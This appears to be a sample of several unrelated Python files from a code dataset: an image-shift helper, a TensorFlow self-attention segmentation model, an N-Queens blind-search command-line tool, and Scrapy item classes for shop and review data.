    [J,I]=meshgrid(j,i)
    # NOTE(review): v_int[1] offsets the row index and v_int[0] the column
    # index, i.e. v appears to be ordered (x, y) -- confirm against callers.
    Ish = array(I + v_int[1],'i')
    Jsh = array(J + v_int[0],'i')
    # Clamp out-of-range indices to the border (replicate edge pixels).
    Ish[Ish>=a]=a-1
    Jsh[Jsh>=b]=b-1
    Ish[Ish<0]=0
    Jsh[Jsh<0]=0
    img2 = img[Ish, Jsh]
    img3 = frac_shift_2(img2, v_frac)
    return img3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Yizhong
# created_at: 04/09/2018 10:23 PM
import tensorflow as tf
from .rnn import rnn
from .elmo_crf_seg import ELMOCRFSegModel
from .layers import self_attention
class AttnSegModel(ELMOCRFSegModel):
    """ELMo+CRF segmentation model with a windowed self-attention layer
    between two bi-LSTM encoders (TF1 graph-mode code)."""
    def _encode(self):
        """Build the encoder: bi-LSTM -> self-attention -> concat -> bi-LSTM.

        Leaves the final representation in self.encoded_sent and the
        attention weights in self.attn_weights.
        """
        with tf.variable_scope('rnn_1'):
            self.encoded_sent, _ = rnn('bi-lstm', self.embedded_inputs,
                                       self.placeholders['input_length'],
                                       hidden_size=self.hidden_size,
                                       layer_num=1, concat=True)
            self.encoded_sent = tf.nn.dropout(
                self.encoded_sent, self.placeholders['dropout_keep_prob']
            )
        # Windowed self-attention over the first encoder's outputs.
        self.attn_outputs, self.attn_weights = self_attention(
            self.encoded_sent, self.placeholders['input_length'],
            self.window_size)
        self.attn_outputs = tf.nn.dropout(
            self.attn_outputs,
            self.placeholders['dropout_keep_prob']
        )
        # Concatenate LSTM features with attention features along the last
        # (hidden) dimension before the second encoder.
        self.encoded_sent = tf.concat([self.encoded_sent, self.attn_outputs],
                                      -1)
        with tf.variable_scope('rnn_2'):
            self.encoded_sent, _ = rnn('bi-lstm',
                                       self.encoded_sent,
                                       self.placeholders['input_length'],
                                       hidden_size=self.hidden_size, layer_num=1, concat=True)
            self.encoded_sent = tf.nn.dropout(
                self.encoded_sent,
                self.placeholders['dropout_keep_prob'])
|
__author__ = 'saimanoj'
import preprocessing
import sys
def main():
    """Run test-set preprocessing (train preprocessing is left disabled)."""
    # preprocessing.preprocess_train(arg)
    preprocessing.preprocess_test()
if __name__ == "__main__":
    main()
|
import argparse
from search.BFS import BFS
from search.DFS import DFS
# Command-line front end for the blind-search N-Queens solvers.
parser = argparse.ArgumentParser(description='This program solves the N Queens problem using blind search.')
parser.add_argument('--algo', type=str, help='Blind search algorithm to use(BFS, DFS)', default='DFS')
parser.add_argument('--nq', type=int, help='Size of the board', default=8)
parser.add_argument('--path', type=int, help='Level of verbose for path printing('
                                             '2 [Print path of all nodes],'
                                             '1 [Print path only of objective state],'
                                             '0 [Print only objective state])', default=0)
args = parser.parse_args()
if args.algo == 'BFS':
    search = BFS(args.nq)
elif args.algo == 'DFS':
    search = DFS(args.nq)
else:
    search = None
# Validate explicitly instead of the original `try: search.solve(...)
# except AttributeError`, which also masked genuine AttributeErrors raised
# from inside solve().
if search is None:
    print('Unknown algorithm. Please use BFS or DFS')
else:
    search.solve(args.path)
import scrapy
class UrlItem(scrapy.Item):
    """Scrapy item holding a batch of shop-page URLs to crawl."""
    # list of harvested page URLs
    url_list = scrapy.Field()
    # shop name
    shop_name=scrapy.Field()
class ShopItem(scrapy.Item):
    """Scrapy item for one shop's listing data."""
    # shop name
    shop_name=scrapy.Field()
    # number of reviews
    comment_num=scrapy.Field()
    # average spend per person
    avg_pay=scrapy.Field()
    # taste rating
    taste=scrapy.Field()
    # ambience rating
    environment=scrapy.Field()
    # service rating
    service=scrapy.Field()
    # address
    place=scrapy.Field()
    # phone number
    phone=scrapy.Field()
    # shop category
    shop_type = scrapy.Field()
    # opening hours
    open_time = scrapy.Field()
    # reviews
    # comment=scrapy.Field()
    # image set
    # imglist=scrapy.Field()
    # image storage path
    # img_path=scrapy.Field()
class CommentItem (scrapy.Item):
    """Scrapy item for a single user review of a shop."""
    # shop name
    shop_name=scrapy.Field()
    # shop city
    city=scrapy.Field()
    # star rating
    star=scrapy.Field()
    # reviewer
    author=scrapy.Field()
    # reviewer's average spend
    avg_pay=scrapy.Field()
    # taste rating
    taste=scrapy.Field()
    # ambience rating
    environment=scrapy.Field()
    # service rating
    service=scrapy.Field()
    # review text
    comment=scrapy.Field()
    # favourite dishes
    like_dishes=scrapy.Field()
    # image URLs
    img_url=scrapy.Field()
    # review date
    date=scrapy.Field()
    # photo album
    album=scrapy.Field()
    # user id
    user_id=scrapy.Field()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.